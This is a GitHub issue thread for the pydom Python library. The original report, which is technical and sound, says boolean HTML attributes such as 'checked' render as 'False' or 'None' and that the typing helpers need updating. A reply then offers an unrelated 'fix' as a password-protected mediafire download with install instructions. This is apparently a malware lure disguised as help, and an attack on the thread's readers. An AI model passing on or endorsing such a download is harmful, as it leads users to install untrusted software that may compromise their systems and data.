### ISSUE TITLE
html "boolean" indicators (e.g. `checked`)

### ISSUE THREAD

**Issue by elazarcoh** [xpodev/pydom#4]
Currently, to renderer `checked` dynamically, you have to resort to write something like this:
```python
from pydom import Input, render

print(render(Input(**({"checked": True} if True else {}))))
# <input checked>

print(render(Input(**({"checked": True} if False else {}))))
# <input>
```

The more pythonic variation results in unwanted html:
```python
Input(checked=False) 
# <input checked="False">

Input(checked=None)
# <input checked="None">
```

Note: fixing it will require also updating the TypedDict typing helpers, as currently `checked` expect a string (which probably doesn't make sense anyway).

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
